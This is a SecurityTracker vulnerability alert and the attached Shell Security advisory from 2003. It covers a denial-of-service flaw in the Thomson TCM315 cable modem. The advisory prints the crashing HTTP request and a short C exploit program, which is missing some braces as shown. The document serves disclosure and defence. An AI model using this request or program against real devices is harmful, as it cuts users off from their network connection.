Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Thomson TCM315 Can Be Crashed By Remote Users
|
|
SecurityTracker Alert ID: 1008281
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 24 2003
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Advisory: Shell Security
|
Description: Shell Security reported a vulnerability in the Thomson TCM315 cable modem. A remote user can cause denial of service conditions.
It is reported that a remote user can send a long HTTP request to the modem to cause the device to stop processing network traffic.
A
demonstration exploit request is provided:
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HTTP/1.1
A demonstration exploit script is provided in the Source Message.
The vendor has reportedly been notified.
The
original advisory is available at:
http://www.shellsec.net/leer_advisory.php?id=2
|
Impact: A remote user can cause the device to stop processing network traffic.
|
Solution: No solution was available at the time of this entry.
|
Cause: Exception handling error
|
Reported By: Administrador de ShellSec <admin@shellsec.net>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 23 Nov 2003 16:17:25 +0100
From: Administrador de ShellSec <admin@shellsec.net>
Subject: Thomnson TCM315 Denial of service
|
___________________________________________________________________________
. : Shell Security Advisory : .
Subject: Buffer overflow in the cable modem Thomson TCM315
Issue date: 2003 November 23
Related link: http://www.shellsec.net/leer_advisory.php?id=2
Homepage: http://www.shellsec.net
Info about product: http://www.qb.ro/docs/tcm315.pdf
___________________________________________________________________________
[ - 1 - Introduction ]
----------------------------
Software description:
Thomson TCM315 cable modem
- DOCSIS 1.0 certified
- DOCSIS 2.0 ready and DOCSIS 1.1 compliant
- NAT/PAT/Firewall and integrated router for SOHO installations (in a
separate software release)
- Bridging between the USB and Ethernet port
- Easy Access to Advanced Diagnostics Web Pages
- USB port for easy installation
- Reliable high-performance platform
- Surf the Internet Up to 100 Times Faster than a 56k analog Modem
- Internet On-Off button for enhanced security
[ - 2 - Problem description ]
----------------------------------------
The problem appears by sending an HTTP request with a long string to the
cable modem, causing a deny of service (DoS). Example:
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
or
http://<cablemodem.IP>/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[ - 3 - How to exploit it ]
----------------------------------
To test this vulnerability, we used the next code. Note: the code is
written in C to be used in Windows systems, but it's easily portable to
Unix systems.
--------------------- CUT HERE ---------------------
/*
ADVISORY - Thomson Cablemodem TCM315 Denial of Service
Shell security group (2003) http://www.shellsec.net
November 10 of 2003
Tested against: TCM315 MP
Software Version: ST31.04.00
Software Model: A801
Bootloader: 2.1.4c
Impact: Users with access to the network can remotely shutdown internet
connection.
Discovered by: aT4r Andres[at]shellsec.net
Vendor: contacted (no answer)
Fix: no yet
usage: just, thdos.exe 192.168.100.1
*/
#include <stdio.h>
#include <winsock2.h>
void main(int argc,char *argv[]) {
char evil[150],buffer[1000];
struct sockaddr_in shellsec;
int fd;
WSADATA ws;
WSAStartup( MAKEWORD(1,1), &( ws) );
shellsec.sin_family = AF_INET;
shellsec.sin_port = htons(80);
shellsec.sin_addr.s_addr = inet_addr(argv[1]);
memset(evil,'\0',sizeof(evil));
memset(evil,'A',100);
sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil);
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) {
send(fd,buffer,strlen(buffer),0);
printf("done. Thomson Cablemodem reset!\n");
sleep(100);
else printf("Unable to connect to CM.\n");
--------------------- CUT HERE ---------------------
[ - 4 - Solution ]
-----------------------
Thomson was advised about this vulnerability, but we got no answer, so as
we know there is no patch to fix this issue.. As a possible solution, you
can filter requests made to the cable modem.
[ - 5 - Credits ]
---------------------
Autor: Andrés Tarascó ( andres[at]shellsec.net )
Redactor: Fernando Ortega ( fernando[at]shellsec.net )
Issue date: 23 de Noviembre de 2003
Url: http://www.shellsec.net
_______________________________________________________
Administrador de Shell Security (admin[at]shellsec.net)
Shell Security Group (http://www.shellsec.net)
_______________________________________________________
|
|
Go to the Top of This SecurityTracker Archive Page
|
